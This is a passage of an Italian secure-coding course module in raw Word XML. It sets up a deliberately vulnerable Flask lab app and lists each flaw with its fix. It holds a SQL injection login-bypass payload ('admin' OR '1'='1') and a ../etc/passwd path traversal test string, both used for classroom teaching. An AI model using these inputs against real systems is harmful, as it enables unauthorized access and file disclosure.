        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">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os.path.realpath(os.path.join(UPLOAD_DIR, filename))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full_path.startswith(UPLOAD_DIR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os.sep):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4) Esistenza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os.path.isfile(full_path):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send_from_directory(UPLOAD_DIR, filename, as_attachment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52"/>
    <w:bookmarkStart w:id="53" w:name="difese-stratificate-5"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Difese stratificate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1011"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">✅ Whitelist nome file (non concatenare input dell’utente).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startswith(BASE_DIR)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✅ Whitelist estensione.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1011"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">✅ Servire da object storage (S3/MinIO) invece che da filesystem locale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1011"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">✅ Filesystem permissions stretti (l’utente di processo non legge</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc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Setup rapido bancapiccola-mini</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Per i lab di M6, costruirete progressivamente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bancapiccola-mini</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: una webapp Flask che parte vulnerabile e diventa sicura al termine del modulo.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="53"/>
    <w:bookmarkEnd w:id="54"/>
    <w:bookmarkStart w:id="55" w:name="struttura-iniziale-cap-m6.2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.1 Struttura iniziale (cap M6.2)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bancapiccola-mini/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├── .venv/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├── app.py          ← cuore della webapp</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├── schema.sql      ← schema DB</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├── seed.py         ← popola con dati di test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base.html</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   ├── login.html</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   ├── dashboard.html</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   ├── fatture.html</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   └── fattura.html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└── style.css</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├── uploads/        ← per il lab path traversal</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">└── requirements.txt</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="55"/>
    <w:bookmarkStart w:id="56" w:name="comandi-base-per-ogni-lab"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.2 Comandi base (per ogni lab)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Setup iniziale (solo prima volta)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bancapiccola-mini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ctivate.ps1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seed.py</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Avvio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In un altro terminale: test attacco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"email=admin' OR '1'='1&amp;password=anything"</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="56"/>
    <w:bookmarkStart w:id="57" w:name="stato-del-codice-per-modulo"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.3 Stato del codice per modulo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Stato di partenza</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Stato finale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M6.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">login f-string SQLi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">login query parametrizzata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/fattura/&lt;id&gt;</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">no authz</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">con ownership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M6.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">password in SHA-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">password con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M6.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">template Jinja con</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">\|safe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">escape attivo +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con CVE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/download?file=</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w: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path validation completa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</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: ogni step è</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">commit separato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in Git. A fine M6 lo studente ha una storia Git che è il diario del proprio apprendimento.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="57"/>
    <w:bookmarkStart w:id="58" w:name="versione-finale-bancapiccola-secure"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.4 Versione finale =</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“BancaPiccola-secure”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Alla fine di M6, lo studente ha trasformato</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bancapiccola-mini-vuln</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nella versione sicura. Questo è il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">modello mentale</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per il lab integrato M7 dove farà la stessa operazione su BancaPiccola completa (più feature, più vulnerabilità).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Mapping OWASP ↔ CWE ↔ GDPR</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tabella di sintesi che lega tecnica e normativa. Memorizzala — entra nei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241"/>
        <w:gridCol w:w="747"/>
        <w:gridCol w:w="1643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Vulnerabilità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GDPR Art.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sanzione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Broken Access Control / IDOR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">285, 639</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">5(1)(f), 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Password in MD5/SHA1/chiaro</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">327, 328, 916</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">32(1)(a)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No HTTPS / TLS debole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32(1)(a)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5(1)(f), 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XSS (variante)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Insecure Design (no threat model)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Security Misconfiguration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Vulnerable Components</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1104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Identification &amp; Auth Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">287, 384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Software &amp; Data Integrity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">829, 502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Logging &amp; Monitoring Failures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918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Lettura veloce</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: praticamente ogni vulnerabilità OWASP è anche violazione GDPR Art. 32 (</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“misure tecniche adeguate”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Il livello tecnico</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">è</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">il livello legale.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Checklist di chiusura modulo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Al termine di M6 il discente deve essere in grado di:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">☐ Citare la OWASP Top 10:2025 (almeno le prime 5)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">☐ Leggere un CVE e interpretare il CVSS score</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">☐ RICONOSCERE in codice una SQL Injection</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">☐ SFRUTTARLA con payload di base</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">☐ CORREGGERLA con query parametrizzate</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">☐ RICONOSCERE un IDOR</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">☐ TESTARLO cambiando ID</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">☐ CORREGGERLO con ownership check</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">☐ DIFFERENZIARE encoding, hashing, encryption</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">☐ VEDERE la differenza tra MD5 e bcrypt nel DB</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">☐ MIGRARE da SHA-1 a bcrypt</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">☐ RICONOSCERE i 3 tipi di XSS (Reflected/Stored/DOM)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">☐ SFRUTTARE XSS riflessa con payload base</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">☐ CORREGGERE con Jinja2 escape + CSP</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">☐ ESEGUIRE pip-audit</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">☐ AGGIORNARE dipendenze vulnerabili</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">☐ RICONOSCERE Path Traversal</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">☐ TESTARE con ../etc/passwd</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">☐ CORREGGERE con realpath + startswith</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">☐ Leggere bancapiccola-mini-secure e capirla</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">☐ Pronto per il lab integrato M7 su BancaPiccola completa</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="58"/>
    <w:bookmarkStart w:id="59" w:name="X7a3c4f6d143d83e9c9045e14aee08117174a083"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Errori da evitare per il docente in classe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 fare i lab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">“sulla carta”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: i discenti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">devono vedere il proprio attacco riuscire</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">prima della difesa. È il momento di apprendimento più alto.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 chiudere bancapiccola-mini a fine M6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: serve in M7.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Tenere la finestra</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">“vulnerabile”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“sicura”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">affiancate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nei diff. La differenza è sempre piccola (3-5 righe) — il discente capisce che la sicurezza è precisione, non quantità.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Saltare M6.7 se sei in ritardo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: path traversal è importante ma in 9 ore è il primo da sacrificare. Diventa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“homework”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">guidato.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="59"/>
    <w:bookmarkStart w:id="60" w:name="errori-da-evitare-per-il-discente"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Errori da evitare per il discente</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1013"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">❌ Pensare che bcrypt sia</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“lento, scelgo SHA-256”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. È</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">lento di proposito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t xml:space="preserve">“Filtro gli apici, sono al sicuro da SQLi”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. No.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t xml:space="preserve">“L’ID nascosto nell’UI difende da IDOR”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. No.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1013"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">❌ Disabilitare l’escape Jinja2 con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|safe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“essere flessibili”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Quasi sempre è sbagliato.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t xml:space="preserve">“Nessuno può trovare il mio endpoint admin/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pannello-segreto-2024-xyz</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Sicurezza per oscurità: scoperta in giorni.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M7 — Lab Integrato (2h). Adesso che sai</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">cosa cercare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come correggere</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, lo applichi su BancaPiccola completa.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="60"/>
    <w:bookmarkEnd w:id="61"/>
    <w:bookmarkEnd w:id="62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2026-05-06T22:05:54Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-06T22:05:54Z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